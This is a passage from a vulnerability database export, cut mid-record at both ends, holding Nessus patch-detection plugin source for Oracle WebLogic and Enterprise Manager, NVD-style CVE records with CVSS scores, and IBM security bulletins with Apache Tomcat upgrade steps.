(patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', 'Missing patch');\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-20T15:48:19", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities:\n\n - An unspecified vulnerability in the Spring Framework allows a low privileged, remote attacker with network access via HTTP to compromise and takeover the Oracle Communications Unified Inventory Management. (CVE-2018-1258) \n - An unspecified vulnerability in the WLS Core Component allows an authenticated low privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized update, insert or delete access to Oracle WebLogic Server accessible data. (CVE-2019-2568)\n\n - An unspecified vulnerability in the WLS Core Component which allows an authenticated, high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. (CVE-2019-2615)\n\n - An unspecified vulnerability in the WLS Core Component which allows an authenticated, high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data. (CVE-2019-2618)\n\n - An unspecified vulnerability in the WLS Core Components allows an unauthenticated, remote attacker with network access via T3 to compromise and takeover the Oracle WebLogic Server. (CVE-2019-2645)\n\n - An unspecified vulnerability in the EJB Container allows an unauthenticated, remote attacker with network access via T3 to compromise and takeover the Oracle WebLogic Server. (CVE-2019-2646)\n\n - An unspecified vulnerability in the WLS - Web Services which allows an authenticated, high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. (CVE-2019-2647) (CVE-2019-2648) (CVE-2019-2649) (CVE-2019-2650)\n\n - An unspecified vulnerability in the WLS Core Component allows an authenticated low privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized update, insert or delete access to Oracle WebLogic Server accessible data. (CVE-2019-2658)", "cvss3": {}, "published": "2019-04-18T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1258", "CVE-2019-2568", "CVE-2019-2615", "CVE-2019-2618", "CVE-2019-2645", "CVE-2019-2646", "CVE-2019-2647", "CVE-2019-2648", "CVE-2019-2649", "CVE-2019-2650", "CVE-2019-2658"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/124122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124122);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2018-1258\",\n \"CVE-2019-2568\",\n \"CVE-2019-2615\",\n \"CVE-2019-2618\",\n \"CVE-2019-2645\",\n \"CVE-2019-2646\",\n \"CVE-2019-2647\",\n \"CVE-2019-2648\",\n \"CVE-2019-2649\",\n \"CVE-2019-2650\",\n \"CVE-2019-2658\"\n );\n script_bugtraq_id(\n 104222,\n 107914,\n 107916,\n 107920,\n 107939,\n 107944\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0128\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Apr 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities:\n\n - An unspecified vulnerability in the Spring Framework allows\n a low privileged, remote attacker with network access via HTTP to\n compromise and takeover the Oracle Communications Unified \n Inventory Management. (CVE-2018-1258)\n \n - An unspecified vulnerability in the WLS Core Component allows an \n authenticated low privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting \n in unauthorized update, insert or delete access to Oracle \n WebLogic Server accessible data. (CVE-2019-2568)\n\n - An unspecified vulnerability in the WLS Core Component which \n allows an authenticated, high privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting\n in unauthorized access to critical data or complete access to all\n Oracle WebLogic Server accessible data. (CVE-2019-2615)\n\n - An unspecified vulnerability in the WLS Core Component which \n allows an authenticated, high privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting\n in unauthorized access to critical data or complete access to all\n Oracle WebLogic Server accessible data as well as unauthorized \n update, insert or delete access to some of Oracle WebLogic Server \n accessible data. (CVE-2019-2618)\n\n - An unspecified vulnerability in the WLS Core Components allows\n an unauthenticated, remote attacker with network access via T3 to\n compromise and takeover the Oracle WebLogic Server. \n (CVE-2019-2645)\n\n - An unspecified vulnerability in the EJB Container allows\n an unauthenticated, remote attacker with network access via T3 to\n compromise and takeover the Oracle WebLogic Server. \n (CVE-2019-2646)\n\n - An unspecified vulnerability in the WLS - Web Services which \n allows an authenticated, high privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting\n in unauthorized access to critical data or complete access to all\n Oracle WebLogic Server accessible data. (CVE-2019-2647)\n (CVE-2019-2648) (CVE-2019-2649) (CVE-2019-2650)\n\n - An unspecified vulnerability in the WLS Core Component allows an \n authenticated low privileged attacker with network \n access via HTTP to compromise Oracle WebLogic Server, resulting \n in unauthorized update, insert or delete access to Oracle \n WebLogic Server accessible data. (CVE-2019-2658)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?06438612\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019 Oracle\nCritical Patch Update advisory.\n\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-2658\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"obj.inc\");\ninclude(\"spad_log_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\nspad_log(message:\"checking version [\" + version + \"]\");\n# individual security patches\nif (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = \"12.2.1.3.190416\";\n fix = make_list(\"29016089\");\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.190416\";\n fix = make_list(\"29204657\");\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.190416\";\n fix = make_list(\"U5I2\"); # patchid is obtained from the readme and 10.3.6.x assets are different\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nspad_log(message:\"checking fix [\" + obj_rep(fix) + \"]\");\nPATCHED=FALSE;\n\n# Iterate over the list of patches and check the install for the patchID\nforeach id (fix)\n{\n spad_log(message:\"Checking fix id: [\" + id +\"]\");\n if (install[id])\n {\n PATCHED=TRUE;\n break;\n }\n}\n\nVULN=FALSE;\nif (ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n VULN=TRUE;\n\nif (PATCHED || !VULN)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif ('windows' >< tolower(os))\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\nelse port = 0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:\", \", fix);\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-23T02:29:32", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in Enterprise Manager Base Platform component:\n\n - A deserialization vulnerability in Apache Commons FileUpload allows for remote code execution.\n (CVE-2016-1000031)\n\n - An information disclosure vulnerability exists in OpenSSL due to the potential for a side-channel timing attack.\n An unauthenticated attacker can exploit this to disclose potentially sensitive information. (CVE-2018-0734)\n\n - A denial of service (DoS) vulnerability exists in Apache HTTP Server 2.4.17 to 2.4.34, due to a design error. An unauthenticated, remote attacker can exploit this issue by sending continuous, large SETTINGS frames to cause a client to occupy a connection, server thread and CPU time without any connection timeout coming to effect.\n This affects only HTTP/2 connections. A possible mitigation is to not enable the h2 protocol.\n (CVE-2018-11763).\n\n - Networking component of Enterprise Manager Base Platform (Spring Framework) is easily exploited and may allow an unauthenticated, remote attacker to takeover the Enterprise Manager Base Platform. (CVE-2018-1258)", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Ops Center (Apr 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2018-0161", "CVE-2018-0734", "CVE-2018-0735", "CVE-2018-5407", "CVE-2018-11763", "CVE-2017-9798", "CVE-2018-1258", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1257", "CVE-2018-15756"], "modified": "2019-05-17T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager_ops_center"], "id": "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/125147", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125147);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/05/17 9:44:17\");\n\n script_cve_id(\n \"CVE-2016-1000031\",\n \"CVE-2018-0161\",\n \"CVE-2018-0734\",\n \"CVE-2018-0735\",\n \"CVE-2018-5407\",\n \"CVE-2018-11763\",\n \"CVE-2017-9798\",\n \"CVE-2018-1258\",\n \"CVE-2018-11039\",\n \"CVE-2018-11040\",\n \"CVE-2018-1257\",\n \"CVE-2018-15756\"\n );\n\n script_bugtraq_id(\n 93604,\n 100872,\n 103573,\n 104222,\n 104260,\n 105414,\n 105703,\n 105750,\n 105758,\n 105897,\n 107984,\n 107986\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0130\");\n\n script_name(english:\"Oracle Enterprise Manager Ops Center (Apr 2019 CPU)\");\n script_summary(english:\"Checks for the patch ID.\");\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - A deserialization vulnerability in Apache Commons\n FileUpload allows for remote code execution.\n (CVE-2016-1000031)\n\n - An information disclosure vulnerability exists in OpenSSL\n due to the potential for a side-channel timing attack.\n An unauthenticated attacker can exploit this to disclose\n potentially sensitive information. (CVE-2018-0734)\n\n - A denial of service (DoS) vulnerability exists in Apache\n HTTP Server 2.4.17 to 2.4.34, due to a design error. An\n unauthenticated, remote attacker can exploit this issue\n by sending continuous, large SETTINGS frames to cause a\n client to occupy a connection, server thread and CPU\n time without any connection timeout coming to effect.\n This affects only HTTP/2 connections. A possible\n mitigation is to not enable the h2 protocol.\n (CVE-2018-11763).\n\n - Networking component of Enterprise Manager Base Platform\n (Spring Framework) is easily exploited and may allow an\n unauthenticated, remote attacker to takeover the\n Enterprise Manager Base Platform. (CVE-2018-1258)\n\n\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9166970d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019\nOracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1000031\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager_ops_center\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_ops_center_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Ops Center\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\napp_name = 'Oracle Enterprise Manager Ops Center';\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nversion_full = install['Full Patch Version'];\npath = install['path'];\npatch_version = install['Patch Version'];\n\n\npatchid = NULL;\nfix = NULL;\n\nif (version_full =~ \"^12\\.3\\.3\\.\")\n{\n patchid = '29623885';\n fix = '1819';\n} \n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\nif (ver_compare(ver:patch_version, fix:fix, strict:FALSE) != -1)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version_full, path);\n\nreport = \n '\\n Path : ' + path + \n '\\n Version : ' + version + \n '\\n Ops Agent Version : ' + version_full + \n '\\n Current Patch : ' + patch_version + \n '\\n Fixed Patch Version : ' + fix +\n '\\n Fix : ' + patchid;\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T02:30:07", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-06-12T07:15:00", "id": "PRION:CVE-2018-11776", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T02:52:04", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2018-05-16T16:29:00", "type": "prion", "title": "Default configuration", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2018-8014", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-8014", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T02:31:25", "description": "Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T20:29:00", "type": "prion", "title": "Authorization", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2022-04-11T17:18:00", "id": "PRION:CVE-2018-1258", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-1258", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-21T21:47:28", "description": "## Summary\n\nIBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10.1.4-10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10.1.4 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p413_Apache-Struts-Vulnerability-Fix&source=SAR&function=fixId&parent=IBM%20Security \nIBM Security Guardium | 10.5 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p512_Sep-24-2018&source=SAR&function=fixId&parent=IBM%20Security \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-28T04:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-28T04:30:01", "id": "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "href": "https://www.ibm.com/support/pages/node/732783", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T06:16:22", "description": "## Summary\n\nThis interim fix provides instructions on upgrading Apache Tomcat from v5.5.36 to v7.0.90 in IBM Platform Symphony 6.1.1 and from v6.0.43 to v8.5.32 in IBM Platform Symphony 7.1 Fix Pack 1 in order to address security vulnerability CVE-2018-8014 in Tomcat. \n\n## Vulnerability Details\n\nCVE-ID: CVE-2018-8014 \nDescription: Apache Tomcat could provide weaker than expected security, caused by insecure default settings for the CORS filter. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: https://exchange.xforce.ibmcloud.com/vulnerabilities/143411 for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nPlatform Symphony 6.1.1 \nPlatform Symphony 7.1 Fix Pack 1\n\n## Remediation/Fixes\n\n**Applicability** \nOperating systems: Linux2.6-glibc2.3-x86_64 \nCluster type: Single grid cluster \n**Packages**\n\n**_Product_** | **_APAR_** | _**Remediation/First Fix** _ \n---|---|--- \n_IBM Platform Symphony 6.1.1_ | _P102656_ | \n\n[_sym6.1.1_lnx26-lib23-x64_build497567.tar.gz_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build497567&includeSupersedes=0>) \n \n_IBM Platform Symphony 7.1 Fix Pack 1_ | _P102656_ | \n\n[_sym7.1_lnx26-lib23-x64_build497568.tar.gz_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build497568&includeSupersedes=0>) \n \n_Apache Tomcat 7.0.90_ | _N/A_ | \n\n[_apache-tomcat-7.0.90.tar.gz_](<http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz>) \n \n_Apache Tomcat 8.5.32_ | _N/A_ | \n\n[_apache-tomcat-8.5.32.tar.gz_](<http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.32/bin/apache-tomcat-8.5.32.tar.gz>) \n \n## _**For Platform Symphony 6.1.1**_\n\n### **Optional prerequisite**\n\nFor a Platform Symphony 6.1.1 cluster, you can optionally take advantage of a security service pack. To apply this interim fix along with the security service pack:\n\n 1. Install the service pack ([sym-6.1.1-spk-Security-build227853](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=Platform+Computing&product=ibm/Other+software/Platform+Symphony&release=6.1.1&platform=All&function=fixId&fixids=sym-6.1.1-spk-Security-build227853&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)).\n\n 2. Apply this interim fix (_sym6.1.1_lnx26-lib23-x64_build497567.tar.gz_) to your cluster.\n\nIf you do not want to apply the 6.1.1 security service pack, proceed to directly apply this interim fix to your cluster.\n\n### **Installation**\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -x Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. Log on to each management host in the cluster and back up the following files for recovery purposes: \n$EGO_TOP/gui/1.2.8/tomcat/ \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml \n$EGO_TOP/gui/ego/1.2.8/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/6.1.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/1.2.8/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/soamgui/WEB-INF/web.xml\n\n 3. On each management host, copy the _apache-tomcat-7.0.90.tar.gz_ package to a temporary folder and decompress the file: \n> cp apache-tomcat-7.0.90.tar.gz /tmp \n> tar zxvf apache-tomcat-7.0.90.tar.gz \n> rm -rf apache-tomcat-7.0.90/conf/ \n> rm -rf apache-tomcat-7.0.90/work/ \n> rm -rf apache-tomcat-7.0.90/logs/\n\n 4. Copy the Tomcat folder: \n> rm -rf $EGO_TOP/gui/1.2.8/tomcat \n> cp -rf apache-tomcat-7.0.90 $EGO_TOP/gui/1.2.8/tomcat\n\n 5. Copy the _sym6.1.1_lnx26-lib23-x64_build497567.tar.gz_ package and decompress it: \n> tar zxfo sym6.1.1_lnx26-lib23-x64_build497567.tar.gz -C $EGO_TOP\n\n 6. If you ran the \u201c**egoconfig mghost **_shared_dir_\u201d command during installation to set up a shared location for configuration files, ensure that the configuration file is changed in the shared directory: \n> cp $EGO_TOP/gui/conf/catalina.policy $EGO_CONFDIR/../../gui/conf/catalina.policy \n> cp 